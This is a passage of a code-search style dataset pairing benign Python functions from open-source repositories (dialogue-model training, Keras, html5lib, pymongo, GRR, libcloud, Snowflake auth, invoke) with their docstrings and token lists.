src_field=corpus.SRC, tgt_field=corpus.TGT, cue_field=corpus.CUE,
max_length=config.max_dec_len, ignore_unk=config.ignore_unk,
length_average=config.length_average, use_gpu=config.use_gpu)
# Interactive generation testing
if config.interact and config.ckpt:
model.load(config.ckpt)
return generator
# Testing
elif config.test and config.ckpt:
print(model)
model.load(config.ckpt)
print("Testing ...")
metrics, scores = evaluate(model, test_iter)
print(metrics.report_cum())
print("Generating ...")
evaluate_generation(generator, test_iter, save_file=config.gen_file, verbos=True)
else:
# Load word embeddings
if config.use_embed and config.embed_file is not None:
model.encoder.embedder.load_embeddings(
corpus.SRC.embeddings, scale=0.03)
model.decoder.embedder.load_embeddings(
corpus.TGT.embeddings, scale=0.03)
# Optimizer definition
optimizer = getattr(torch.optim, config.optimizer)(
model.parameters(), lr=config.lr)
# Learning rate scheduler
if config.lr_decay is not None and 0 < config.lr_decay < 1.0:
lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer,
factor=config.lr_decay, patience=1, verbose=True, min_lr=1e-5)
else:
lr_scheduler = None
# Save directory
date_str, time_str = datetime.now().strftime("%Y%m%d-%H%M%S").split("-")
result_str = "{}-{}".format(model_name, time_str)
if not os.path.exists(config.save_dir):
os.makedirs(config.save_dir)
# Logger definition
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG, format="%(message)s")
fh = logging.FileHandler(os.path.join(config.save_dir, "train.log"))
logger.addHandler(fh)
# Save config
params_file = os.path.join(config.save_dir, "params.json")
with open(params_file, 'w') as fp:
json.dump(config.__dict__, fp, indent=4, sort_keys=True)
print("Saved params to '{}'".format(params_file))
logger.info(model)
# Train
logger.info("Training starts ...")
trainer = Trainer(model=model, optimizer=optimizer, train_iter=train_iter,
valid_iter=valid_iter, logger=logger, generator=generator,
valid_metric_name="-loss", num_epochs=config.num_epochs,
save_dir=config.save_dir, log_steps=config.log_steps,
valid_steps=config.valid_steps, grad_clip=config.grad_clip,
lr_scheduler=lr_scheduler, save_summary=False)
if config.ckpt is not None:
trainer.load(file_prefix=config.ckpt)
trainer.train()
logger.info("Training done!")
# Test
logger.info("")
trainer.load(os.path.join(config.save_dir, "best"))
logger.info("Testing starts ...")
metrics, scores = evaluate(model, test_iter)
logger.info(metrics.report_cum())
logger.info("Generation starts ...")
test_gen_file = os.path.join(config.save_dir, "test.result")
evaluate_generation(generator, test_iter, save_file=test_gen_file, verbos=True)
|
[
"def",
"main",
"(",
")",
":",
"config",
"=",
"model_config",
"(",
")",
"if",
"config",
".",
"check",
":",
"config",
".",
"save_dir",
"=",
"\"./tmp/\"",
"config",
".",
"use_gpu",
"=",
"torch",
".",
"cuda",
".",
"is_available",
"(",
")",
"and",
"config",
".",
"gpu",
">=",
"0",
"device",
"=",
"config",
".",
"gpu",
"torch",
".",
"cuda",
".",
"set_device",
"(",
"device",
")",
"# Data definition",
"corpus",
"=",
"KnowledgeCorpus",
"(",
"data_dir",
"=",
"config",
".",
"data_dir",
",",
"data_prefix",
"=",
"config",
".",
"data_prefix",
",",
"min_freq",
"=",
"0",
",",
"max_vocab_size",
"=",
"config",
".",
"max_vocab_size",
",",
"min_len",
"=",
"config",
".",
"min_len",
",",
"max_len",
"=",
"config",
".",
"max_len",
",",
"embed_file",
"=",
"config",
".",
"embed_file",
",",
"with_label",
"=",
"config",
".",
"with_label",
",",
"share_vocab",
"=",
"config",
".",
"share_vocab",
")",
"corpus",
".",
"load",
"(",
")",
"if",
"config",
".",
"test",
"and",
"config",
".",
"ckpt",
":",
"corpus",
".",
"reload",
"(",
"data_type",
"=",
"'test'",
")",
"train_iter",
"=",
"corpus",
".",
"create_batches",
"(",
"config",
".",
"batch_size",
",",
"\"train\"",
",",
"shuffle",
"=",
"True",
",",
"device",
"=",
"device",
")",
"valid_iter",
"=",
"corpus",
".",
"create_batches",
"(",
"config",
".",
"batch_size",
",",
"\"valid\"",
",",
"shuffle",
"=",
"False",
",",
"device",
"=",
"device",
")",
"test_iter",
"=",
"corpus",
".",
"create_batches",
"(",
"config",
".",
"batch_size",
",",
"\"test\"",
",",
"shuffle",
"=",
"False",
",",
"device",
"=",
"device",
")",
"# Model definition",
"model",
"=",
"KnowledgeSeq2Seq",
"(",
"src_vocab_size",
"=",
"corpus",
".",
"SRC",
".",
"vocab_size",
",",
"tgt_vocab_size",
"=",
"corpus",
".",
"TGT",
".",
"vocab_size",
",",
"embed_size",
"=",
"config",
".",
"embed_size",
",",
"hidden_size",
"=",
"config",
".",
"hidden_size",
",",
"padding_idx",
"=",
"corpus",
".",
"padding_idx",
",",
"num_layers",
"=",
"config",
".",
"num_layers",
",",
"bidirectional",
"=",
"config",
".",
"bidirectional",
",",
"attn_mode",
"=",
"config",
".",
"attn",
",",
"with_bridge",
"=",
"config",
".",
"with_bridge",
",",
"tie_embedding",
"=",
"config",
".",
"tie_embedding",
",",
"dropout",
"=",
"config",
".",
"dropout",
",",
"use_gpu",
"=",
"config",
".",
"use_gpu",
",",
"use_bow",
"=",
"config",
".",
"use_bow",
",",
"use_dssm",
"=",
"config",
".",
"use_dssm",
",",
"use_pg",
"=",
"config",
".",
"use_pg",
",",
"use_gs",
"=",
"config",
".",
"use_gs",
",",
"pretrain_epoch",
"=",
"config",
".",
"pretrain_epoch",
",",
"use_posterior",
"=",
"config",
".",
"use_posterior",
",",
"weight_control",
"=",
"config",
".",
"weight_control",
",",
"concat",
"=",
"config",
".",
"decode_concat",
")",
"model_name",
"=",
"model",
".",
"__class__",
".",
"__name__",
"# Generator definition",
"generator",
"=",
"TopKGenerator",
"(",
"model",
"=",
"model",
",",
"src_field",
"=",
"corpus",
".",
"SRC",
",",
"tgt_field",
"=",
"corpus",
".",
"TGT",
",",
"cue_field",
"=",
"corpus",
".",
"CUE",
",",
"max_length",
"=",
"config",
".",
"max_dec_len",
",",
"ignore_unk",
"=",
"config",
".",
"ignore_unk",
",",
"length_average",
"=",
"config",
".",
"length_average",
",",
"use_gpu",
"=",
"config",
".",
"use_gpu",
")",
"# Interactive generation testing",
"if",
"config",
".",
"interact",
"and",
"config",
".",
"ckpt",
":",
"model",
".",
"load",
"(",
"config",
".",
"ckpt",
")",
"return",
"generator",
"# Testing",
"elif",
"config",
".",
"test",
"and",
"config",
".",
"ckpt",
":",
"print",
"(",
"model",
")",
"model",
".",
"load",
"(",
"config",
".",
"ckpt",
")",
"print",
"(",
"\"Testing ...\"",
")",
"metrics",
",",
"scores",
"=",
"evaluate",
"(",
"model",
",",
"test_iter",
")",
"print",
"(",
"metrics",
".",
"report_cum",
"(",
")",
")",
"print",
"(",
"\"Generating ...\"",
")",
"evaluate_generation",
"(",
"generator",
",",
"test_iter",
",",
"save_file",
"=",
"config",
".",
"gen_file",
",",
"verbos",
"=",
"True",
")",
"else",
":",
"# Load word embeddings",
"if",
"config",
".",
"use_embed",
"and",
"config",
".",
"embed_file",
"is",
"not",
"None",
":",
"model",
".",
"encoder",
".",
"embedder",
".",
"load_embeddings",
"(",
"corpus",
".",
"SRC",
".",
"embeddings",
",",
"scale",
"=",
"0.03",
")",
"model",
".",
"decoder",
".",
"embedder",
".",
"load_embeddings",
"(",
"corpus",
".",
"TGT",
".",
"embeddings",
",",
"scale",
"=",
"0.03",
")",
"# Optimizer definition",
"optimizer",
"=",
"getattr",
"(",
"torch",
".",
"optim",
",",
"config",
".",
"optimizer",
")",
"(",
"model",
".",
"parameters",
"(",
")",
",",
"lr",
"=",
"config",
".",
"lr",
")",
"# Learning rate scheduler",
"if",
"config",
".",
"lr_decay",
"is",
"not",
"None",
"and",
"0",
"<",
"config",
".",
"lr_decay",
"<",
"1.0",
":",
"lr_scheduler",
"=",
"torch",
".",
"optim",
".",
"lr_scheduler",
".",
"ReduceLROnPlateau",
"(",
"optimizer",
"=",
"optimizer",
",",
"factor",
"=",
"config",
".",
"lr_decay",
",",
"patience",
"=",
"1",
",",
"verbose",
"=",
"True",
",",
"min_lr",
"=",
"1e-5",
")",
"else",
":",
"lr_scheduler",
"=",
"None",
"# Save directory",
"date_str",
",",
"time_str",
"=",
"datetime",
".",
"now",
"(",
")",
".",
"strftime",
"(",
"\"%Y%m%d-%H%M%S\"",
")",
".",
"split",
"(",
"\"-\"",
")",
"result_str",
"=",
"\"{}-{}\"",
".",
"format",
"(",
"model_name",
",",
"time_str",
")",
"if",
"not",
"os",
".",
"path",
".",
"exists",
"(",
"config",
".",
"save_dir",
")",
":",
"os",
".",
"makedirs",
"(",
"config",
".",
"save_dir",
")",
"# Logger definition",
"logger",
"=",
"logging",
".",
"getLogger",
"(",
"__name__",
")",
"logging",
".",
"basicConfig",
"(",
"level",
"=",
"logging",
".",
"DEBUG",
",",
"format",
"=",
"\"%(message)s\"",
")",
"fh",
"=",
"logging",
".",
"FileHandler",
"(",
"os",
".",
"path",
".",
"join",
"(",
"config",
".",
"save_dir",
",",
"\"train.log\"",
")",
")",
"logger",
".",
"addHandler",
"(",
"fh",
")",
"# Save config",
"params_file",
"=",
"os",
".",
"path",
".",
"join",
"(",
"config",
".",
"save_dir",
",",
"\"params.json\"",
")",
"with",
"open",
"(",
"params_file",
",",
"'w'",
")",
"as",
"fp",
":",
"json",
".",
"dump",
"(",
"config",
".",
"__dict__",
",",
"fp",
",",
"indent",
"=",
"4",
",",
"sort_keys",
"=",
"True",
")",
"print",
"(",
"\"Saved params to '{}'\"",
".",
"format",
"(",
"params_file",
")",
")",
"logger",
".",
"info",
"(",
"model",
")",
"# Train",
"logger",
".",
"info",
"(",
"\"Training starts ...\"",
")",
"trainer",
"=",
"Trainer",
"(",
"model",
"=",
"model",
",",
"optimizer",
"=",
"optimizer",
",",
"train_iter",
"=",
"train_iter",
",",
"valid_iter",
"=",
"valid_iter",
",",
"logger",
"=",
"logger",
",",
"generator",
"=",
"generator",
",",
"valid_metric_name",
"=",
"\"-loss\"",
",",
"num_epochs",
"=",
"config",
".",
"num_epochs",
",",
"save_dir",
"=",
"config",
".",
"save_dir",
",",
"log_steps",
"=",
"config",
".",
"log_steps",
",",
"valid_steps",
"=",
"config",
".",
"valid_steps",
",",
"grad_clip",
"=",
"config",
".",
"grad_clip",
",",
"lr_scheduler",
"=",
"lr_scheduler",
",",
"save_summary",
"=",
"False",
")",
"if",
"config",
".",
"ckpt",
"is",
"not",
"None",
":",
"trainer",
".",
"load",
"(",
"file_prefix",
"=",
"config",
".",
"ckpt",
")",
"trainer",
".",
"train",
"(",
")",
"logger",
".",
"info",
"(",
"\"Training done!\"",
")",
"# Test",
"logger",
".",
"info",
"(",
"\"\"",
")",
"trainer",
".",
"load",
"(",
"os",
".",
"path",
".",
"join",
"(",
"config",
".",
"save_dir",
",",
"\"best\"",
")",
")",
"logger",
".",
"info",
"(",
"\"Testing starts ...\"",
")",
"metrics",
",",
"scores",
"=",
"evaluate",
"(",
"model",
",",
"test_iter",
")",
"logger",
".",
"info",
"(",
"metrics",
".",
"report_cum",
"(",
")",
")",
"logger",
".",
"info",
"(",
"\"Generation starts ...\"",
")",
"test_gen_file",
"=",
"os",
".",
"path",
".",
"join",
"(",
"config",
".",
"save_dir",
",",
"\"test.result\"",
")",
"evaluate_generation",
"(",
"generator",
",",
"test_iter",
",",
"save_file",
"=",
"test_gen_file",
",",
"verbos",
"=",
"True",
")"
] |
https://github.com/baidu/knowledge-driven-dialogue/blob/ba85518a1ac2a57988188fc5f2b8fe42e1facf64/generative_pt/network.py#L104-L215
|
||
ShuaiW/teach-machine-to-trade
|
19dfc2c6537e61ac6eb0102caeb5ed6d32454f99
|
model.py
|
python
|
mlp
|
(n_obs, n_action, n_hidden_layer=1, n_neuron_per_layer=32,
activation='relu', loss='mse')
|
return model
|
A multi-layer perceptron
|
A multi-layer perceptron
|
[
"A",
"multi",
"-",
"layer",
"perceptron"
] |
def mlp(n_obs, n_action, n_hidden_layer=1, n_neuron_per_layer=32,
activation='relu', loss='mse'):
""" A multi-layer perceptron """
model = Sequential()
model.add(Dense(n_neuron_per_layer, input_dim=n_obs, activation=activation))
for _ in range(n_hidden_layer):
model.add(Dense(n_neuron_per_layer, activation=activation))
model.add(Dense(n_action, activation='linear'))
model.compile(loss=loss, optimizer=Adam())
print(model.summary())
return model
|
[
"def",
"mlp",
"(",
"n_obs",
",",
"n_action",
",",
"n_hidden_layer",
"=",
"1",
",",
"n_neuron_per_layer",
"=",
"32",
",",
"activation",
"=",
"'relu'",
",",
"loss",
"=",
"'mse'",
")",
":",
"model",
"=",
"Sequential",
"(",
")",
"model",
".",
"add",
"(",
"Dense",
"(",
"n_neuron_per_layer",
",",
"input_dim",
"=",
"n_obs",
",",
"activation",
"=",
"activation",
")",
")",
"for",
"_",
"in",
"range",
"(",
"n_hidden_layer",
")",
":",
"model",
".",
"add",
"(",
"Dense",
"(",
"n_neuron_per_layer",
",",
"activation",
"=",
"activation",
")",
")",
"model",
".",
"add",
"(",
"Dense",
"(",
"n_action",
",",
"activation",
"=",
"'linear'",
")",
")",
"model",
".",
"compile",
"(",
"loss",
"=",
"loss",
",",
"optimizer",
"=",
"Adam",
"(",
")",
")",
"print",
"(",
"model",
".",
"summary",
"(",
")",
")",
"return",
"model"
] |
https://github.com/ShuaiW/teach-machine-to-trade/blob/19dfc2c6537e61ac6eb0102caeb5ed6d32454f99/model.py#L7-L17
|
|
rembo10/headphones
|
b3199605be1ebc83a7a8feab6b1e99b64014187c
|
lib/html5lib/inputstream.py
|
python
|
EncodingBytes.__next__
|
(self)
|
return self[p:p + 1]
|
[] |
def __next__(self):
p = self._position = self._position + 1
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
return self[p:p + 1]
|
[
"def",
"__next__",
"(",
"self",
")",
":",
"p",
"=",
"self",
".",
"_position",
"=",
"self",
".",
"_position",
"+",
"1",
"if",
"p",
">=",
"len",
"(",
"self",
")",
":",
"raise",
"StopIteration",
"elif",
"p",
"<",
"0",
":",
"raise",
"TypeError",
"return",
"self",
"[",
"p",
":",
"p",
"+",
"1",
"]"
] |
https://github.com/rembo10/headphones/blob/b3199605be1ebc83a7a8feab6b1e99b64014187c/lib/html5lib/inputstream.py#L582-L588
|
|||
Georce/lepus
|
5b01bae82b5dc1df00c9e058989e2eb9b89ff333
|
lepus/pymongo-2.7/pymongo/mongo_replica_set_client.py
|
python
|
MongoReplicaSetClient.use_greenlets
|
(self)
|
return self.__use_greenlets
|
Whether calling :meth:`start_request` assigns greenlet-local,
rather than thread-local, sockets.
.. versionadded:: 2.4.2
|
Whether calling :meth:`start_request` assigns greenlet-local,
rather than thread-local, sockets.
|
[
"Whether",
"calling",
":",
"meth",
":",
"start_request",
"assigns",
"greenlet",
"-",
"local",
"rather",
"than",
"thread",
"-",
"local",
"sockets",
"."
] |
def use_greenlets(self):
"""Whether calling :meth:`start_request` assigns greenlet-local,
rather than thread-local, sockets.
.. versionadded:: 2.4.2
"""
return self.__use_greenlets
|
[
"def",
"use_greenlets",
"(",
"self",
")",
":",
"return",
"self",
".",
"__use_greenlets"
] |
https://github.com/Georce/lepus/blob/5b01bae82b5dc1df00c9e058989e2eb9b89ff333/lepus/pymongo-2.7/pymongo/mongo_replica_set_client.py#L914-L920
|
|
google/grr
|
8ad8a4d2c5a93c92729206b7771af19d92d4f915
|
grr/server/grr_response_server/flows/general/filesystem.py
|
python
|
ListDirectory.NotifyAboutEnd
|
(self)
|
Sends a notification that this flow is done.
|
Sends a notification that this flow is done.
|
[
"Sends",
"a",
"notification",
"that",
"this",
"flow",
"is",
"done",
"."
] |
def NotifyAboutEnd(self):
"""Sends a notification that this flow is done."""
if not self.state.urn:
super().NotifyAboutEnd()
return
st = self.state.stat
ps_path_type = st.pathspec.last.pathtype
path_type = rdf_objects.PathInfo.PathTypeFromPathspecPathType(ps_path_type)
full_path = st.pathspec.CollapsePath()
path_components = full_path.strip("/").split("/")
file_ref = rdf_objects.VfsFileReference(
client_id=self.client_id,
path_type=path_type,
path_components=path_components)
notification.Notify(
self.creator,
rdf_objects.UserNotification.Type.TYPE_VFS_LIST_DIRECTORY_COMPLETED,
"Listed {0}".format(full_path),
rdf_objects.ObjectReference(
reference_type=rdf_objects.ObjectReference.Type.VFS_FILE,
vfs_file=file_ref))
|
[
"def",
"NotifyAboutEnd",
"(",
"self",
")",
":",
"if",
"not",
"self",
".",
"state",
".",
"urn",
":",
"super",
"(",
")",
".",
"NotifyAboutEnd",
"(",
")",
"return",
"st",
"=",
"self",
".",
"state",
".",
"stat",
"ps_path_type",
"=",
"st",
".",
"pathspec",
".",
"last",
".",
"pathtype",
"path_type",
"=",
"rdf_objects",
".",
"PathInfo",
".",
"PathTypeFromPathspecPathType",
"(",
"ps_path_type",
")",
"full_path",
"=",
"st",
".",
"pathspec",
".",
"CollapsePath",
"(",
")",
"path_components",
"=",
"full_path",
".",
"strip",
"(",
"\"/\"",
")",
".",
"split",
"(",
"\"/\"",
")",
"file_ref",
"=",
"rdf_objects",
".",
"VfsFileReference",
"(",
"client_id",
"=",
"self",
".",
"client_id",
",",
"path_type",
"=",
"path_type",
",",
"path_components",
"=",
"path_components",
")",
"notification",
".",
"Notify",
"(",
"self",
".",
"creator",
",",
"rdf_objects",
".",
"UserNotification",
".",
"Type",
".",
"TYPE_VFS_LIST_DIRECTORY_COMPLETED",
",",
"\"Listed {0}\"",
".",
"format",
"(",
"full_path",
")",
",",
"rdf_objects",
".",
"ObjectReference",
"(",
"reference_type",
"=",
"rdf_objects",
".",
"ObjectReference",
".",
"Type",
".",
"VFS_FILE",
",",
"vfs_file",
"=",
"file_ref",
")",
")"
] |
https://github.com/google/grr/blob/8ad8a4d2c5a93c92729206b7771af19d92d4f915/grr/server/grr_response_server/flows/general/filesystem.py#L161-L186
|
||
LabPy/lantz
|
3e878e3f765a4295b0089d04e241d4beb7b8a65b
|
lantz/drivers/legacy/andor/ccd.py
|
python
|
CCD.n_horiz_shift_speeds
|
(self, channel=0, typ=None)
|
return n.value
|
As your Andor SDK system is capable of operating at more than one
horizontal shift speed this function will return the actual number of
speeds available.
Parameters
int channel: the AD channel.
int typ: output amplification.
Valid values: 0 electron multiplication.
1 conventional.
int* speeds: number of allowed horizontal speeds
|
As your Andor SDK system is capable of operating at more than one
horizontal shift speed this function will return the actual number of
speeds available.
Parameters
int channel: the AD channel.
int typ: output amplification.
Valid values: 0 electron multiplication.
1 conventional.
int* speeds: number of allowed horizontal speeds
|
[
"As",
"your",
"Andor",
"SDK",
"system",
"is",
"capable",
"of",
"operating",
"at",
"more",
"than",
"one",
"horizontal",
"shift",
"speed",
"this",
"function",
"will",
"return",
"the",
"actual",
"number",
"of",
"speeds",
"available",
".",
"Parameters",
"int",
"channel",
":",
"the",
"AD",
"channel",
".",
"int",
"typ",
":",
"output",
"amplification",
".",
"Valid",
"values",
":",
"0",
"electron",
"multiplication",
".",
"1",
"conventional",
".",
"int",
"*",
"speeds",
":",
"number",
"of",
"allowed",
"horizontal",
"speeds"
] |
def n_horiz_shift_speeds(self, channel=0, typ=None):
""" As your Andor SDK system is capable of operating at more than one
horizontal shift speed this function will return the actual number of
speeds available.
Parameters
int channel: the AD channel.
int typ: output amplification.
Valid values: 0 electron multiplication.
1 conventional.
int* speeds: number of allowed horizontal speeds
"""
if typ is None:
typ = self.amp_typ
n = ct.c_int()
self.lib.GetNumberHSSpeeds(ct.c_int(channel),
ct.c_int(typ), ct.pointer(n))
return n.value
|
[
"def",
"n_horiz_shift_speeds",
"(",
"self",
",",
"channel",
"=",
"0",
",",
"typ",
"=",
"None",
")",
":",
"if",
"typ",
"is",
"None",
":",
"typ",
"=",
"self",
".",
"amp_typ",
"n",
"=",
"ct",
".",
"c_int",
"(",
")",
"self",
".",
"lib",
".",
"GetNumberHSSpeeds",
"(",
"ct",
".",
"c_int",
"(",
"channel",
")",
",",
"ct",
".",
"c_int",
"(",
"typ",
")",
",",
"ct",
".",
"pointer",
"(",
"n",
")",
")",
"return",
"n",
".",
"value"
] |
https://github.com/LabPy/lantz/blob/3e878e3f765a4295b0089d04e241d4beb7b8a65b/lantz/drivers/legacy/andor/ccd.py#L1465-L1484
|
|
mnot/nbhttp
|
80389f168f3bb3f0dbc7f6aee648e3286eed0a7a
|
src/server.py
|
python
|
test_handler
|
(method, uri, hdrs, res_start, req_pause)
|
return dummy, dummy
|
An extremely simple (and limited) server request_handler.
|
An extremely simple (and limited) server request_handler.
|
[
"An",
"extremely",
"simple",
"(",
"and",
"limited",
")",
"server",
"request_handler",
"."
] |
def test_handler(method, uri, hdrs, res_start, req_pause):
"""
An extremely simple (and limited) server request_handler.
"""
code = "200"
phrase = "OK"
res_hdrs = [('Content-Type', 'text/plain')]
res_body, res_done = res_start(code, phrase, res_hdrs, dummy)
res_body('foo!')
res_done(None)
return dummy, dummy
|
[
"def",
"test_handler",
"(",
"method",
",",
"uri",
",",
"hdrs",
",",
"res_start",
",",
"req_pause",
")",
":",
"code",
"=",
"\"200\"",
"phrase",
"=",
"\"OK\"",
"res_hdrs",
"=",
"[",
"(",
"'Content-Type'",
",",
"'text/plain'",
")",
"]",
"res_body",
",",
"res_done",
"=",
"res_start",
"(",
"code",
",",
"phrase",
",",
"res_hdrs",
",",
"dummy",
")",
"res_body",
"(",
"'foo!'",
")",
"res_done",
"(",
"None",
")",
"return",
"dummy",
",",
"dummy"
] |
https://github.com/mnot/nbhttp/blob/80389f168f3bb3f0dbc7f6aee648e3286eed0a7a/src/server.py#L283-L293
|
|
snarfed/granary
|
ab085de2aef0cff8ac31a99b5e21443a249e8419
|
granary/facebook.py
|
python
|
Facebook._find_all_text
|
(soup, regexp)
|
return soup.find_all(lambda tag: any(regexp.match(c.string.strip())
for c in tag.contents if c.string))
|
BeautifulSoup utility that searches for text and returns a Tag.
I'd rather just use soup.find(string=...), but it returns a NavigableString
instead of a Tag, and I need a Tag so I can look at the elements inside it.
https://www.crummy.com/software/BeautifulSoup/bs4/doc/#the-string-argument
Args:
soup: BeautifulSoup
regexp: string, must match target's text after stripping whitespace
|
BeautifulSoup utility that searches for text and returns a Tag.
|
[
"BeautifulSoup",
"utility",
"that",
"searches",
"for",
"text",
"and",
"returns",
"a",
"Tag",
"."
] |
def _find_all_text(soup, regexp):
"""BeautifulSoup utility that searches for text and returns a Tag.
I'd rather just use soup.find(string=...), but it returns a NavigableString
instead of a Tag, and I need a Tag so I can look at the elements inside it.
https://www.crummy.com/software/BeautifulSoup/bs4/doc/#the-string-argument
Args:
soup: BeautifulSoup
regexp: string, must match target's text after stripping whitespace
"""
regexp = re.compile(regexp)
return soup.find_all(lambda tag: any(regexp.match(c.string.strip())
for c in tag.contents if c.string))
|
[
"def",
"_find_all_text",
"(",
"soup",
",",
"regexp",
")",
":",
"regexp",
"=",
"re",
".",
"compile",
"(",
"regexp",
")",
"return",
"soup",
".",
"find_all",
"(",
"lambda",
"tag",
":",
"any",
"(",
"regexp",
".",
"match",
"(",
"c",
".",
"string",
".",
"strip",
"(",
")",
")",
"for",
"c",
"in",
"tag",
".",
"contents",
"if",
"c",
".",
"string",
")",
")"
] |
https://github.com/snarfed/granary/blob/ab085de2aef0cff8ac31a99b5e21443a249e8419/granary/facebook.py#L1697-L1710
|
|
snowflakedb/snowflake-connector-python
|
1659ec6b78930d1f947b4eff985c891af614d86c
|
src/snowflake/connector/auth_webbrowser.py
|
python
|
AuthByWebBrowser._process_options
|
(self, data, socket_client)
|
return True
|
Allows JS Ajax access to this endpoint.
|
Allows JS Ajax access to this endpoint.
|
[
"Allows",
"JS",
"Ajax",
"access",
"to",
"this",
"endpoint",
"."
] |
def _process_options(self, data, socket_client):
"""Allows JS Ajax access to this endpoint."""
for line in data:
if line.startswith("OPTIONS "):
break
else:
return False
self._get_user_agent(data)
requested_headers, requested_origin = self._check_post_requested(data)
if not requested_headers:
return False
if not self._validate_origin(requested_origin):
# validate Origin and fail if not match with the server.
return False
self._origin = requested_origin
content = [
"HTTP/1.1 200 OK",
"Date: {}".format(
time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime())
),
"Access-Control-Allow-Methods: POST, GET",
"Access-Control-Allow-Headers: {}".format(requested_headers),
"Access-Control-Max-Age: 86400",
"Access-Control-Allow-Origin: {}".format(self._origin),
"",
"",
]
socket_client.sendall("\r\n".join(content).encode("utf-8"))
return True
|
[
"def",
"_process_options",
"(",
"self",
",",
"data",
",",
"socket_client",
")",
":",
"for",
"line",
"in",
"data",
":",
"if",
"line",
".",
"startswith",
"(",
"\"OPTIONS \"",
")",
":",
"break",
"else",
":",
"return",
"False",
"self",
".",
"_get_user_agent",
"(",
"data",
")",
"requested_headers",
",",
"requested_origin",
"=",
"self",
".",
"_check_post_requested",
"(",
"data",
")",
"if",
"not",
"requested_headers",
":",
"return",
"False",
"if",
"not",
"self",
".",
"_validate_origin",
"(",
"requested_origin",
")",
":",
"# validate Origin and fail if not match with the server.",
"return",
"False",
"self",
".",
"_origin",
"=",
"requested_origin",
"content",
"=",
"[",
"\"HTTP/1.1 200 OK\"",
",",
"\"Date: {}\"",
".",
"format",
"(",
"time",
".",
"strftime",
"(",
"\"%a, %d %b %Y %H:%M:%S GMT\"",
",",
"time",
".",
"gmtime",
"(",
")",
")",
")",
",",
"\"Access-Control-Allow-Methods: POST, GET\"",
",",
"\"Access-Control-Allow-Headers: {}\"",
".",
"format",
"(",
"requested_headers",
")",
",",
"\"Access-Control-Max-Age: 86400\"",
",",
"\"Access-Control-Allow-Origin: {}\"",
".",
"format",
"(",
"self",
".",
"_origin",
")",
",",
"\"\"",
",",
"\"\"",
",",
"]",
"socket_client",
".",
"sendall",
"(",
"\"\\r\\n\"",
".",
"join",
"(",
"content",
")",
".",
"encode",
"(",
"\"utf-8\"",
")",
")",
"return",
"True"
] |
https://github.com/snowflakedb/snowflake-connector-python/blob/1659ec6b78930d1f947b4eff985c891af614d86c/src/snowflake/connector/auth_webbrowser.py#L167-L198
|
|
pyinvoke/invoke
|
45dc9d03639dac5b6d1445831bf270e686ef88b4
|
invoke/watchers.py
|
python
|
Responder.pattern_matches
|
(self, stream, pattern, index_attr)
|
return matches
|
Generic "search for pattern in stream, using index" behavior.
Used here and in some subclasses that want to track multiple patterns
concurrently.
:param unicode stream: The same data passed to ``submit``.
:param unicode pattern: The pattern to search for.
:param unicode index_attr: The name of the index attribute to use.
:returns: An iterable of string matches.
.. versionadded:: 1.0
|
Generic "search for pattern in stream, using index" behavior.
|
[
"Generic",
"search",
"for",
"pattern",
"in",
"stream",
"using",
"index",
"behavior",
"."
] |
def pattern_matches(self, stream, pattern, index_attr):
"""
Generic "search for pattern in stream, using index" behavior.
Used here and in some subclasses that want to track multiple patterns
concurrently.
:param unicode stream: The same data passed to ``submit``.
:param unicode pattern: The pattern to search for.
:param unicode index_attr: The name of the index attribute to use.
:returns: An iterable of string matches.
.. versionadded:: 1.0
"""
# NOTE: generifies scanning so it can be used to scan for >1 pattern at
# once, e.g. in FailingResponder.
# Only look at stream contents we haven't seen yet, to avoid dupes.
index = getattr(self, index_attr)
new_ = stream[index:]
# Search, across lines if necessary
matches = re.findall(pattern, new_, re.S)
# Update seek index if we've matched
if matches:
setattr(self, index_attr, index + len(new_))
return matches
|
[
"def",
"pattern_matches",
"(",
"self",
",",
"stream",
",",
"pattern",
",",
"index_attr",
")",
":",
"# NOTE: generifies scanning so it can be used to scan for >1 pattern at",
"# once, e.g. in FailingResponder.",
"# Only look at stream contents we haven't seen yet, to avoid dupes.",
"index",
"=",
"getattr",
"(",
"self",
",",
"index_attr",
")",
"new_",
"=",
"stream",
"[",
"index",
":",
"]",
"# Search, across lines if necessary",
"matches",
"=",
"re",
".",
"findall",
"(",
"pattern",
",",
"new_",
",",
"re",
".",
"S",
")",
"# Update seek index if we've matched",
"if",
"matches",
":",
"setattr",
"(",
"self",
",",
"index_attr",
",",
"index",
"+",
"len",
"(",
"new_",
")",
")",
"return",
"matches"
] |
https://github.com/pyinvoke/invoke/blob/45dc9d03639dac5b6d1445831bf270e686ef88b4/invoke/watchers.py#L78-L102
|
|
apache/libcloud
|
90971e17bfd7b6bb97b2489986472c531cc8e140
|
libcloud/compute/drivers/vultr.py
|
python
|
VultrNodeDriverV2.list_volumes
|
(self)
|
return [self._to_volume(item) for item in data]
|
List storage volumes.
:rtype: ``list`` of :class:`StorageVolume`
|
List storage volumes.
|
[
"List",
"storage",
"volumes",
"."
] |
def list_volumes(self) -> List[StorageVolume]:
"""List storage volumes.
:rtype: ``list`` of :class:`StorageVolume`
"""
data = self._paginated_request("/v2/blocks", "blocks")
return [self._to_volume(item) for item in data]
|
[
"def",
"list_volumes",
"(",
"self",
")",
"->",
"List",
"[",
"StorageVolume",
"]",
":",
"data",
"=",
"self",
".",
"_paginated_request",
"(",
"\"/v2/blocks\"",
",",
"\"blocks\"",
")",
"return",
"[",
"self",
".",
"_to_volume",
"(",
"item",
")",
"for",
"item",
"in",
"data",
"]"
] |
https://github.com/apache/libcloud/blob/90971e17bfd7b6bb97b2489986472c531cc8e140/libcloud/compute/drivers/vultr.py#L1400-L1406
|
|
openshift/openshift-tools
|
1188778e728a6e4781acf728123e5b356380fe6f
|
openshift_tools/monitoring/metric_sender.py
|
python
|
MetricSender.add_dynamic_metric
|
(self, discovery_key, macro_string, macro_array, host=None, synthetic=False)
|
apply add_dynamic_metric for each sender
|
apply add_dynamic_metric for each sender
|
[
"apply",
"add_dynamic_metric",
"for",
"each",
"sender"
] |
def add_dynamic_metric(self, discovery_key, macro_string, macro_array, host=None, synthetic=False):
''' apply add_dynamic_metric for each sender'''
for sender in self.active_senders:
sender.add_dynamic_metric(discovery_key, macro_string, macro_array, host, synthetic)
|
[
"def",
"add_dynamic_metric",
"(",
"self",
",",
"discovery_key",
",",
"macro_string",
",",
"macro_array",
",",
"host",
"=",
"None",
",",
"synthetic",
"=",
